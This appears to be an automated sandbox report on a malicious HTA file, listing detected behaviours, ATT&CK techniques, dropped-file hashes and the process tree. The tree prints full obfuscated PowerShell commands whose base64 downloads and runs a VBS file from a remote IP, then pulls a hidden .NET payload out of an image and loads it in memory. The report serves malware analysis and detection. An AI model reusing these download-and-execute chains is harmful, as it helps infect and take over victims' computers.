23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
06-02-2025 10:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethebewtthingstodothebestwayofgreatnessgod.hta
Size

15KB
MD5

b17075441c09b68399252230d95973af
SHA1

c4951ff30e5c1d76da15be8d097bb9c9b8514235
SHA256

23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b
SHA512

32e325fd879b2c00ede3a2c09348744bfc124b1984640e96ffcaf311b1fd60e63495fd6bf928bfa91cc0216400dedda383891804571667a42314c82efcd7ea9f
SSDEEP

48:3PCUlAEW2JlWjEW2wkkjr0AdbSdx399DdNRAAr5yK4/5hyKQlFlUEW28luG:/CU2EJsEhQpKJfrRHr5ylhyXz6E8n

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1356	powershell.exe
6	660	powershell.exe
8	660	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
1356	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
660	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1356	powershell.exe
660	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	660	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2272 wrote to memory of 2300	2272	mshta.exe	31
PID 2272 wrote to memory of 2300	2272	mshta.exe	31
PID 2272 wrote to memory of 2300	2272	mshta.exe	31
PID 2272 wrote to memory of 2300	2272	mshta.exe	31
PID 2300 wrote to memory of 1356	2300	cmd.exe	33
PID 2300 wrote to memory of 1356	2300	cmd.exe	33
PID 2300 wrote to memory of 1356	2300	cmd.exe	33
PID 2300 wrote to memory of 1356	2300	cmd.exe	33
PID 1356 wrote to memory of 2332	1356	powershell.exe	34
PID 1356 wrote to memory of 2332	1356	powershell.exe	34
PID 1356 wrote to memory of 2332	1356	powershell.exe	34
PID 1356 wrote to memory of 2332	1356	powershell.exe	34
PID 2332 wrote to memory of 2848	2332	csc.exe	35
PID 2332 wrote to memory of 2848	2332	csc.exe	35
PID 2332 wrote to memory of 2848	2332	csc.exe	35
PID 2332 wrote to memory of 2848	2332	csc.exe	35
PID 1356 wrote to memory of 2704	1356	powershell.exe	37
PID 1356 wrote to memory of 2704	1356	powershell.exe	37
PID 1356 wrote to memory of 2704	1356	powershell.exe	37
PID 1356 wrote to memory of 2704	1356	powershell.exe	37
PID 2704 wrote to memory of 660	2704	WScript.exe	38
PID 2704 wrote to memory of 660	2704	WScript.exe	38
PID 2704 wrote to memory of 660	2704	WScript.exe	38
PID 2704 wrote to memory of 660	2704	WScript.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebewtthingstodothebestwayofgreatnessgod.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOwErsHell -eX BYPASs -NoP -W 1 -C deViCecreDENtialdEployMeNT.EXE ; IeX($(IEX('[SYStem.texT.eNcoDiNg]'+[char]58+[cHAr]0X3A+'uTF8.geTsTRIng([sYsTEM.COnvERT]'+[CHAr]0X3A+[Char]0x3A+'fromBAse64STring('+[chAR]34+'JG0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVSREVmaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFiWmhCY1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByUXJMSEwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUNDKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZU1BWm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNDUzL3NlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29kLmdJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXd0dGhpbmdzdG9kb3RoZWJlc3R3YXlvZmdyZWF0bmVzc2dvYmVzdC52YnMiLDAsMCk7c3RhUnQtc2xlZXAoMyk7aU5Wb2tFLWlUZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29iZXN0LnZicyI='+[char]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwErsHell -eX BYPASs -NoP -W 1 -C deViCecreDENtialdEployMeNT.EXE ; IeX($(IEX('[SYStem.texT.eNcoDiNg]'+[char]58+[cHAr]0X3A+'uTF8.geTsTRIng([sYsTEM.COnvERT]'+[CHAr]0X3A+[Char]0x3A+'fromBAse64STring('+[chAR]34+'JG0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVSREVmaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFiWmhCY1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByUXJMSEwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUNDKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZU1BWm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNDUzL3NlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29kLmdJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXd0dGhpbmdzdG9kb3RoZWJlc3R3YXlvZmdyZWF0bmVzc2dvYmVzdC52YnMiLDAsMCk7c3RhUnQtc2xlZXAoMyk7aU5Wb2tFLWlUZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29iZXN0LnZicyI='+[char]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q0s5i7gt.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2332
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD866.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD865.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2848
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebewtthingstodothebestwayofgreatnessgobest.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2704
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAGcAcwBzAGUAbgB0AGEAZQByAGcAZgBvAHkAYQB3AHQAcwBlAGIAZQBoAHQAbwBkAG8AdABzAGcAbgBpAGgAdAB0AHcAZQBiAGUAaAB0AGUAZQBzAC8AMwA1ADQALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAZwBvAGgAdQA3AHMAbAB4AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAOAAwADYANgA5ADMALwBsADgAbABtAG8AMgA2AG8ANwByAGYAOABvAHkAZwByADEAMAB5ADkALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabF865.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD866.tmp

Filesize
1KB

MD5
346e9b49942733a199bb3d15efaafd7c

SHA1
216ecf84b0f6fdc523a3ddcccb2dbdc989e575e9

SHA256
59f19801cdc83ce21a1ba05211ef2252fa7fbfb905567aa3eff1869af05195df

SHA512
3e337f51e864f3dbfcbc6ecd11ee88002e6cb10ad7de60b89ccdbd05cc52aaa804e1f6dee11036f5fa9517a7827a988c3340462d5a8f66652ad5f320e8c4a618

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF8B6.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\q0s5i7gt.dll

Filesize
3KB

MD5
08434734057e562a5c5af8d415cd258a

SHA1
13eab0030b561435a27b5abc434037e3a8242234

SHA256
74b3a7232db96b52b7632c3ccc7458037504e7f786fed6083373eb9f667394f5

SHA512
4197b3e7d2eedb9a7d22b06b4ba7f1858e157de6b1e4e87c982b59185538ec10c5a84d270dfab1f05031633ee6d7a8d9af98e89a9a6dd0cb333b6229c5d694aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\q0s5i7gt.pdb

Filesize
7KB

MD5
fda959ce76f4929b276614cf1d274545

SHA1
03d4fa3b32145a59b5b778531c3400f9320080e4

SHA256
1b65509af3396137f47f64866aadeb24fdd951dff0f57f9cab822d76f3c9b9ec

SHA512
2a341103db20e0a98fb8e830c9b9e2f0e6f0fbc79fe5553f075ec2691c7657a3d75ceaa8a1d3aebbd6a5f62f143dce64db5c16f6e61752102faf50a56e2ce5c9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3OFL0XDTU9JJOBVKIMGW.temp

Filesize
7KB

MD5
996ee4910dbbae8eb98b25d3f1e68ed5

SHA1
725f3cdfc74d7e44e282d26ef1a1e3f6faea34b7

SHA256
994467a1a5c159df72d5c061d46e15caddd96e439b8ee88ea9bc45fa95e20f81

SHA512
4c5473dd872427b517d283e5330591f6bd2310d35d7849e22a69793051691267f584f3d1dda2fb07a985b35deaf731e66f5c6b8d71c87172063473beac92e3cf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
3aa5e22b4b6653b488544ba334418b96

SHA1
92a9221ff99029fd4d8684ab513efdd1a73959f7

SHA256
7dc7c468a62e7111009e86593857a60587a4f8b0963b254aff4762d2667b9415

SHA512
f0948eef45d6f7f130ed12a054c008d8f08c3ce57dad243405c9f5f0b90b9a823b8156821bae13dc8ec363193ebe94b5b9c71ac08c28f18c23f968e6d89d2bb7

Download Submit
C:\Users\Admin\AppData\Roaming\seethebewtthingstodothebestwayofgreatnessgobest.vbs

Filesize
184KB

MD5
8cbb8e8c083138f50289f5722b80d0ec

SHA1
2e9d338f32146e76db9172c61cd95015de939983

SHA256
e574c7c03391b4142af0cfc89a23dc50eeb0573ec4922c6e3b3a032d0cd7a19e

SHA512
edb5c025fa91149cd6ac1364833eb46be5fb03fe0f586d24df00973e90a601b5499d97e47a6f8f618f1b1110721cc6ef81463fbae8021ce3309c1554966fabb5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD865.tmp

Filesize
652B

MD5
b2cb6bd97325fbed7091d439c93e1717

SHA1
d6263fe85cf6f43b81743d7818d12401bf5fdb02

SHA256
8b6b213a494277ad947c8edbdd2959a4ff28519a65354a8aff7e0b5c57aa2861

SHA512
f15eaa063406920a89880b5aca4d6a4f2a60e16e315066ed2da2c741e0c05c9cedc4c6eede1b49bf0d6016b908d4d3243a4df747c7d1b402710b2ca3cacd910a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q0s5i7gt.0.cs

Filesize
459B

MD5
19403550f9bf1d9942a15391df03e6f0

SHA1
26306f174cd81bce51d8fc318693f4268f571fa4

SHA256
3d6d5d032a8c6d8e0bd23e514117ff1a62e24724dd1e93bbe29ead9a58d33fef

SHA512
851893286fc42013dde0507ead8775103eda3af5b7b8e82be156be063359f9ee2bfb660b482d608095871b74c4b960b98e24761ab52ba147158d8fd74c271b3a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q0s5i7gt.cmdline

Filesize
309B

MD5
340c330101223cb47b813c2287ae00f0

SHA1
48b3b6df8d5c1ec96ffbd839531d9829bbad0ea2

SHA256
8a0893f742c3168de005a570f9c2c9c7dcae417ef69d37c01c6ebe0be0f1158f

SHA512
5411677e5a9eb8cee2437d251ecbb1b4162204afa294f3cc3e1b7bd81ac558fd3da8d1cad50b2419660de2c34f3e15cb991640fdb549df1cd9d16128a39cfc99

Download Submit